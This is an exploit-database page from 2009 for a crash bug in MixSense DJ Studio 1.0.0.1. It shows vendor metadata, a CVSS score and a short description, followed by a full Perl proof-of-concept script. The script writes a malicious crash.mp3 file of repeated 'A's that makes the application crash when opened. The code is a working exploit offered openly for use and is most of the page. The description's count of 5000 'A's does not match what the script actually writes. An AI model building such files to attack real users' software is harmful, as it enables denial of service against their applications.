header-logo
Suggest Exploit
vendor:
MixSense DJ Studio
by:
prodigy
7,5
CVSS
HIGH
Crash Vulnerability
N/A
CWE
Product Name: MixSense DJ Studio
Affected Version From: 1.0.0.1
Affected Version To: 1.0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:mixsense:mixsense_dj_studio
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Vulnerability Exploit

MixSense 1.0.0.1 DJ Studio is vulnerable to a crash vulnerability when a malicious .mp3 file is opened. The malicious file contains a string of 5000 'A's which causes the application to crash when opened.

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#
# MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: smack_the_stream@hotmail.com
# 
# Vendor: MixSense
#
# Usage to reproduce the bug: when you created the malicious file, open with Mixsense and booom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.mp3";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-07-16]